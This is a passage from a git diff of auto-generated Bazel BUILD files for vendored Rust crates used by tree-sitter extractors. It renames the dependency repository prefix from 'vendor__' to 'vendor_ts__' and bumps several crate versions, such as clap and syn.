"@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-linux-android ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # x86_64-pc-windows-msvc + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # x86_64-pc-windows-msvc ], "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-freebsd + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-freebsd ], "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-fuchsia + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-fuchsia ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-linux-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-linux-gnu ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-linux-gnu, x86_64-unknown-nixos-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-linux-gnu, x86_64-unknown-nixos-gnu ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.26.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.31.bazel similarity index 96% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.26.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.31.bazel index b0fc737a3a18..704def0d16af 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.26.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.31.bazel 
@@ -41,7 +41,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__clap_derive-4.5.24//:clap_derive", + "@vendor_ts__clap_derive-4.5.28//:clap_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -92,8 +92,8 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "4.5.26", + version = "4.5.31", deps = [ - "@vendor__clap_builder-4.5.26//:clap_builder", + "@vendor_ts__clap_builder-4.5.31//:clap_builder", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.26.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.31.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.26.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.31.bazel index 1cb3a18cd0c1..a65b405d44c7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.26.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.31.bazel @@ -87,11 +87,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "4.5.26", + version = "4.5.31", deps = [ - "@vendor__anstream-0.6.18//:anstream", - "@vendor__anstyle-1.0.10//:anstyle", - "@vendor__clap_lex-0.7.4//:clap_lex", - "@vendor__strsim-0.11.1//:strsim", + "@vendor_ts__anstream-0.6.18//:anstream", + "@vendor_ts__anstyle-1.0.10//:anstyle", + "@vendor_ts__clap_lex-0.7.4//:clap_lex", + "@vendor_ts__strsim-0.11.1//:strsim", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.24.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.28.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.24.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.28.bazel index fdf5dc04a455..1e6c70d11eed 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.24.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.28.bazel @@ -82,11 +82,11 @@ rust_proc_macro( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "4.5.24", + version = "4.5.28", deps = [ - "@vendor__heck-0.5.0//:heck", - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__heck-0.5.0//:heck", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crc32fast-1.4.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crc32fast-1.4.2.bazel index 9c41e7925d47..1bc709e0ab7b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crc32fast-1.4.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crc32fast-1.4.2.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "1.4.2", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-channel-0.5.14.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-channel-0.5.14.bazel index e2b441186d1e..716f7732fc48 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-channel-0.5.14.bazel 
+++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-channel-0.5.14.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.5.14", deps = [ - "@vendor__crossbeam-utils-0.8.21//:crossbeam_utils", + "@vendor_ts__crossbeam-utils-0.8.21//:crossbeam_utils", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-deque-0.8.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-deque-0.8.6.bazel index f0201da11a69..3bb0e6f18ea2 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-deque-0.8.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-deque-0.8.6.bazel @@ -85,7 +85,7 @@ rust_library( }), version = "0.8.6", deps = [ - "@vendor__crossbeam-epoch-0.9.18//:crossbeam_epoch", - "@vendor__crossbeam-utils-0.8.21//:crossbeam_utils", + "@vendor_ts__crossbeam-epoch-0.9.18//:crossbeam_epoch", + "@vendor_ts__crossbeam-utils-0.8.21//:crossbeam_utils", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-epoch-0.9.18.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-epoch-0.9.18.bazel index be6f936368d2..76d404fae876 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-epoch-0.9.18.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-epoch-0.9.18.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.9.18", deps = [ - "@vendor__crossbeam-utils-0.8.21//:crossbeam_utils", + "@vendor_ts__crossbeam-utils-0.8.21//:crossbeam_utils", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-utils-0.8.21.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-utils-0.8.21.bazel index fe420a1c2676..4c738272e68b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-utils-0.8.21.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-utils-0.8.21.bazel 
@@ -86,7 +86,7 @@ rust_library( }), version = "0.8.21", deps = [ - "@vendor__crossbeam-utils-0.8.21//:build_script_build", + "@vendor_ts__crossbeam-utils-0.8.21//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling-0.20.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling-0.20.10.bazel index f2b095874d9c..81ba24ba9546 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling-0.20.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling-0.20.10.bazel @@ -35,7 +35,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__darling_macro-0.20.10//:darling_macro", + "@vendor_ts__darling_macro-0.20.10//:darling_macro", ], rustc_flags = [ "--cap-lints=allow", @@ -88,6 +88,6 @@ rust_library( }), version = "0.20.10", deps = [ - "@vendor__darling_core-0.20.10//:darling_core", + "@vendor_ts__darling_core-0.20.10//:darling_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_core-0.20.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_core-0.20.10.bazel index de185bceab00..299241442a11 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_core-0.20.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_core-0.20.10.bazel @@ -85,11 +85,11 @@ rust_library( }), version = "0.20.10", deps = [ - "@vendor__fnv-1.0.7//:fnv", - "@vendor__ident_case-1.0.1//:ident_case", - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__strsim-0.11.1//:strsim", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__fnv-1.0.7//:fnv", + "@vendor_ts__ident_case-1.0.1//:ident_case", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__strsim-0.11.1//:strsim", + "@vendor_ts__syn-2.0.98//:syn", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_macro-0.20.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_macro-0.20.10.bazel index edd5c9242ce3..aeb122f8a02c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_macro-0.20.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_macro-0.20.10.bazel @@ -81,8 +81,8 @@ rust_proc_macro( }), version = "0.20.10", deps = [ - "@vendor__darling_core-0.20.10//:darling_core", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__darling_core-0.20.10//:darling_core", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.dashmap-5.5.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.dashmap-5.5.3.bazel index 6aa63816f3a7..f761a7301a9b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.dashmap-5.5.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.dashmap-5.5.3.bazel @@ -84,10 +84,10 @@ rust_library( }), version = "5.5.3", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__lock_api-0.4.12//:lock_api", - "@vendor__once_cell-1.20.2//:once_cell", - "@vendor__parking_lot_core-0.9.10//:parking_lot_core", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__lock_api-0.4.12//:lock_api", + "@vendor_ts__once_cell-1.20.3//:once_cell", + "@vendor_ts__parking_lot_core-0.9.10//:parking_lot_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.13.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.14.0.bazel similarity index 98% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.13.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.14.0.bazel index b3a9ed19098a..7d258985cf58 100644 
--- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.13.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.14.0.bazel @@ -33,7 +33,7 @@ rust_library( "use_std", ], crate_root = "src/lib.rs", - edition = "2018", + edition = "2021", rustc_flags = [ "--cap-lints=allow", ], @@ -83,5 +83,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.13.0", + version = "1.14.0", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ena-0.14.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ena-0.14.3.bazel index b1f8132eef70..0675dd061161 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ena-0.14.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ena-0.14.3.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.14.3", deps = [ - "@vendor__log-0.4.22//:log", + "@vendor_ts__log-0.4.25//:log", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-0.2.33.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-0.2.33.bazel index e87060e4b44c..625e2e262168 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-0.2.33.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-0.2.33.bazel 
@@ -81,10 +81,10 @@ rust_library( }), version = "0.2.33", deps = [ - "@vendor__encoding-index-japanese-1.20141219.5//:encoding_index_japanese", - "@vendor__encoding-index-korean-1.20141219.5//:encoding_index_korean", - "@vendor__encoding-index-simpchinese-1.20141219.5//:encoding_index_simpchinese", - "@vendor__encoding-index-singlebyte-1.20141219.5//:encoding_index_singlebyte", - "@vendor__encoding-index-tradchinese-1.20141219.5//:encoding_index_tradchinese", + "@vendor_ts__encoding-index-japanese-1.20141219.5//:encoding_index_japanese", + "@vendor_ts__encoding-index-korean-1.20141219.5//:encoding_index_korean", + "@vendor_ts__encoding-index-simpchinese-1.20141219.5//:encoding_index_simpchinese", + "@vendor_ts__encoding-index-singlebyte-1.20141219.5//:encoding_index_singlebyte", + "@vendor_ts__encoding-index-tradchinese-1.20141219.5//:encoding_index_tradchinese", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-japanese-1.20141219.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-japanese-1.20141219.5.bazel index 880bee66622e..13d487c632d0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-japanese-1.20141219.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-japanese-1.20141219.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.20141219.5", deps = [ - "@vendor__encoding_index_tests-0.1.4//:encoding_index_tests", + "@vendor_ts__encoding_index_tests-0.1.4//:encoding_index_tests", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-korean-1.20141219.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-korean-1.20141219.5.bazel index c7a1933827f7..97a7c7735c15 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-korean-1.20141219.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-korean-1.20141219.5.bazel 
@@ -81,6 +81,6 @@ rust_library( }), version = "1.20141219.5", deps = [ - "@vendor__encoding_index_tests-0.1.4//:encoding_index_tests", + "@vendor_ts__encoding_index_tests-0.1.4//:encoding_index_tests", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-simpchinese-1.20141219.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-simpchinese-1.20141219.5.bazel index 9b21912641fe..1d849a7173a9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-simpchinese-1.20141219.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-simpchinese-1.20141219.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.20141219.5", deps = [ - "@vendor__encoding_index_tests-0.1.4//:encoding_index_tests", + "@vendor_ts__encoding_index_tests-0.1.4//:encoding_index_tests", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-singlebyte-1.20141219.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-singlebyte-1.20141219.5.bazel index 6777eeecd0fe..c2abfe5614be 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-singlebyte-1.20141219.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-singlebyte-1.20141219.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.20141219.5", deps = [ - "@vendor__encoding_index_tests-0.1.4//:encoding_index_tests", + "@vendor_ts__encoding_index_tests-0.1.4//:encoding_index_tests", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-tradchinese-1.20141219.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-tradchinese-1.20141219.5.bazel index a84d85e6d7c6..60e931b095a7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-tradchinese-1.20141219.5.bazel 
+++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-tradchinese-1.20141219.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.20141219.5", deps = [ - "@vendor__encoding_index_tests-0.1.4//:encoding_index_tests", + "@vendor_ts__encoding_index_tests-0.1.4//:encoding_index_tests", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.figment-0.10.19.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.figment-0.10.19.bazel index 96f9285e43c7..176db4ab06a9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.figment-0.10.19.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.figment-0.10.19.bazel 
@@ -89,53 +89,53 @@ rust_library( }), version = "0.10.19", deps = [ - "@vendor__figment-0.10.19//:build_script_build", - "@vendor__pear-0.2.9//:pear", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_yaml-0.9.34-deprecated//:serde_yaml", - "@vendor__uncased-0.9.10//:uncased", + "@vendor_ts__figment-0.10.19//:build_script_build", + "@vendor_ts__pear-0.2.9//:pear", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_yaml-0.9.34-deprecated//:serde_yaml", + "@vendor_ts__uncased-0.9.10//:uncased", ] + select({ "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", 
target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:thumbv7em-none-eabi": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + 
"@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:wasm32-unknown-unknown": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:wasm32-wasip1": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "//conditions:default": [], }), @@ -196,7 +196,7 @@ cargo_build_script( version = "0.10.19", visibility = ["//visibility:private"], deps = [ - "@vendor__version_check-0.9.5//:version_check", + "@vendor_ts__version_check-0.9.5//:version_check", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.filetime-0.2.25.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.filetime-0.2.25.bazel index 598f69662035..afa987bf06c9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.filetime-0.2.25.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.filetime-0.2.25.bazel 
@@ -81,88 +81,88 @@ rust_library( }), version = "0.2.25", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", ] + select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + 
"@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], 